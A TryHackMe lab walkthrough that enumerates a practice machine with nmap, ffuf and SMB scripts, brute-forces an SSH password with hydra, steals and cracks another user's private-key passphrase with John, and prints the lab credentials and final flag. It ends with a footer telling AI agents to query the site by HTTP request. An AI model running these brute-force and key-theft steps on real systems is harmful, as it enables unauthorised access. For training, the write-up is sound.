# THM Basic Pen-Testing Machine

<figure><img src="https://tryhackme-images.s3.amazonaws.com/room-icons/99c72676aab814b94e3bc350ba627b71.png" alt=""><figcaption></figcaption></figure>

**Target IP Address**

```
10.10.142.239
```

## Nmap Scan Report

```bash
Open Ports and services
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
```

So there are lots of open Ports so we can enumerate one by one some of these are used to gain an initial foothold.

## Web server Enumeration

### Hidden Directory Scan

```bash
$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt -u https://$IP/FUZZ

/development
```

This hidden directory has some text that gives us clue that there are two users one name starts with `j` and the other user's name starts with `k` also they give us a clue one of the users has a weak password.

## SMB Enumeration

Using Nmap smb enumeration scripts we found the following shares

```
$ nmap --script=smb-enum $IP

| smb-enum-shares: 
|   account_used: guest
|   \10.10.142.239\Anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \10.10.142.239\IPC$: 
|     Type: STYPE_IPCHIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|    Current user access: READ/WRITE
```

The above Result shows that we have guest user share with `anonymous` access.

by Enumerating the smb with the Nmap `smb-users-enum` script or metasploit module or some other techniques we found these valid users.

Using Smb we found Two user

1. `Jan`
2. `kay`

Now we have valid users so we can use brute forcing to try to get these users' ssh passwords as they have ssh service open. In the web server enumeration stage, we know one of them has a weak password so we can use `hydra` to bruteforce the user's password

### Hydra Bruteforce Result

Using Brute force we found a valid user password

```
userName: jan
password: armando
```

Now we have the `jan` user password so we ssh to the machine to get the foothold using the command

```bash
$ ssh jan@10.10.142.239
password armando
```

Now we have initial access to the system so now we use the other post-exploitation techniques to get more privileges. We can use the `linpeas` script to find privilege escalation vectors. The `linpeas` shows that the `kay` user has an ssh private key that is readable to the `Jan` user so we can read it and copy all the content of that key to our attacking machine change the permission of that key so that only you can read it with the following command

```bash
$ chmod -600 kay_rsa
```

This will change the permission of the key to read/write only for you so now you can ssh to the `kay` user with that key using the following command

```bash
$ ssh -i kay_rsa kay@10.10.142.239
```

This command is used to ssh to that target machine with the private key of the `kay` user. So by running the above command we have found that this key is protected by a password so which means we also need a password to login.

So digging for the password we can use the `sshtojohn` script to get that private key password hash that is understandable to John the Ripper tool.

```bash
$ python ssh2john.py kay_rsa > kay_rsa.hash
```

This will create the hash file of the key and store it in the `kay_rsa.hash` file now we use John to crack the hash or to get the password

```bash
$ john kay_rsa.hash --wordlist=rockyou.txt
```

This will crack the password using the wordlist `rockyou.txt`

Using Bruteforce with John we found the user `kay` ssh key password

```
Username: kay
Password: beeswax
```

So now we have the ssh key password so we can use it to get access to the `kay` user

```bash
$ ssh -i kay_rsa kay@10.10.142.239
password beeswax
```

And this is the final password we found after successful login

```bash
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://w4h33d.gitbook.io/hack-notes/writeups/tryhackme/thm-basic-pen-testing-machine.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.